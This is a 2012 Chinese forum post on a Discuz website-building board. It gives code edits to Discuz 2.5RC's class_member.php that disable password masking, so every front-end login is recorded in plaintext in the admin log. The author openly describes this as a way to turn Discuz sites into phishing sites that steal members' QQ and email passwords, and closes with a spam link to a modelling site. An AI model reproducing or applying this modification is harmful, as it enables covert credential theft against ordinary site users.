找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 3159|回复: 0

[探讨] [原创]DZ2.5RC运行记录有漏洞

[复制链接]
发表于 2012-4-23 23:03:44 | 显示全部楼层 |阅读模式 来自 中国–福建–漳州
这个漏洞在后台,不在前台。我们可以把所有的DZ网站都做成一个钓鱼网站,盗别人QQ、邮箱密码。非常好用。一般人我不告诉他。^_^
之前别人有发布了2.0版本的运行记录的漏洞。我这里就不重复了。
2.5RC的漏洞原理和2.0一样,不过是改变了一些变量而已。
只要会员在前台一登陆,那么密码用户名密码等信息就会如实写入到后台的运行记录。不信,你按着我说的方法试一下。我已经测试成功。^_^

在/source/class/class_member.php这个页面。找出这句话:

$password = preg_replace("/^(.{".round(strlen($_GET['password']) / 4)."})(.+?)(.{".round(strlen($_GET['password']) / 6)."})$/s", "\\1***\\3", $_GET['password']);
$errorlog = dhtmlspecialchars(
TIMES**P."\t".
($result['ucresult']['username'] ? $result['ucresult']['username'] : $_GET['username'])."\t".
$password."\t".
"Ques #".intval($_GET['questionid'])."\t".
$_G['clientip']);
writelog('illegallog', $errorlog);

改成如下代码:
/*记录密码开始*/
/*$password = preg_replace("/^(.{".round(strlen($_GET['password']) / 4)."})(.+?)(.{".round(strlen($_GET['password']) / 6)."})$/s", "\\1***\\3", $_GET['password']);*/
$password = $_GET['password'];
$errorlog = dhtmlspecialchars(
TIMES**P."\t".
($result['ucresult']['username'] ? $result['ucresult']['username'] : $_GET['username'])."\t".
$password."\t".
"Ques #".intval($_GET['questionid'])."\t".
$_G['clientip']);
writelog('illegallog', $errorlog);
/*记录密码结束*/

插入到
if($result['status'] > 0) {
之后即可。

覆盖原文件,你会发现,所有从前台登陆进来的用户名和密码,你都能看得一清二楚了。

发布这个文档,是想做一个广告哈。请管管不要删除,我这是为人民服务,为了让社会变得更加和谐。

要玩私拍,上女模网。

女模网:http://www.nvmote.net

转载本文的时候,不要漏了这句话哦。^_^

发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;

如何回报帮助你解决问题的坛友,好办法就是点击帖子下方的评分按钮给对方加【金币】不会扣除自己的积分,做一个热心并受欢迎的人!

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则 需要先绑定手机号

关闭

站长推荐上一条 /1 下一条

QQ|侵权投诉|广告报价|手机版|小黑屋|西部数码代理|飘仙建站论坛 ( 豫ICP备2022021143号-1 )

GMT+8, 2024-11-22 05:31 , Processed in 0.040107 second(s), 11 queries , Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表